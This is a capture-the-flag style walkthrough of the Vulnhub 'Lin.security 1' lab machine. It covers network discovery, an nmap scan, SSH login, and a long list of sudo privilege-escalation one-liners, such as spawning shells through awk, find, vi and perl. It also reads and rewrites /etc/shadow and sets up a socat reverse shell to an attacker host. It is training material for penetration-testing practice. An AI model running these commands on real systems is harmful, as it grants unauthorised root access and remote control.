Lin.security 1

Posted on

Vulnhub virtual machine; OSCP prep box and a change of pace. This box required to execution of multiple binaries that lead to root. Great information to have worked through.

Legal Usage: The information provided by executeatwill is to be used for educational purposes only. The website creator and/or editor is in no way responsible for any misuse of the information provided. All the information on this website is meant to help the reader develop penetration testing and vulnerability aptitude to prevent attacks discussed. In no way should you use the information to cause any kind of damage directly or indirectly. Information provided by this website is to be regarded from an “ethical hacker” standpoint. Only preform testing on systems you OWN and/or have expressed written permission. Use information at your own risk.

By continued reading, you acknowledge the aforementioned user risk/responsibilities.

Vulnhub Link: https://www.vulnhub.com/entry/linsecurity-1,244/ File: lin.security_v1.0.ova (virtualbox)

Discover VM on network:

1
netdiscover -r 192.168.56.0/24

Target: 192.168.56.115

Enumeration

Nmap Scan:

1
nmap -sV -sC -oA nmap/lin 192.168.56.115

SSH (front door) Port 111 (non standard port) Port 2049 (non standard port)

…. Goes back to Vulhub - read description

without fail… its always the last line… we have credentials.

Login via SSH

1
ssh [email protected]

perform sudo check

1
sudo -l

bob has access to quite a few binaries lets investigate:

Root Binary Practice

ash

1
sudo ash

awk

1
sudo awk 'BEGIN {system("whoami")}'

bin/bash

1
sudo /bin/bash

bin/csh

1
sudo csh

curl just use curl to download a script

dash

1
sudo dash

ed

1
2
sudo ed
! whoami

(ctrl+z to stop)

env

1
sudo env /bin/bash

expect

1
sudo expect -i

find

1
sudo find /dev/null -exec sh \;

ftp

1
2
sudo ftp
! /bin/bash

less

1
2
sudo less shell.sh
!sh #entered after when inside text editor

shell.sh

1
2
#!/bin/sh
/bin/sh

man

1
2
sudo man man
!sh entered after when inside text editor

more

1
sudo more /etc/shadow

(prints shadow file hashes)

socat Attacking machine:

1
socat file: 'tty',raw,echo=0 tcp-listen:4444

Victim machine:

1
sudo socat exec: 'bash -li',pty,stderr,setsid,sigint,sane tcp 192.168.56.102:4444

reverse connection establishes.

vi

1
2
sudo vi
:shell

alternative (quicker):

1
sudo vi -c '!bash'

pico first create a new password

1
openssl passwd -1 -salt xyz password


1
sudo pico /etc/shadow

(opens editor to make changes to shadow: replace root password with created password)

rvim

1
sudo rvim /etc/shadow

(change password like above pico)

perl

1
2
sudo perl
exec "/bin/bash"; #after typed press ctrl+d to execute

tclsh

1
sudo tclsh

finally inside /home/susan lives a file called .secret which contains the flag.

Bring me the root!

-exec

Cont. Learning

Shoutout to Hackso.me that has a great write-up with entire breakdown of get inside the box and working through the users. Well documented and worth checking out.

https://hackso.me/lin.security-1-walkthrough/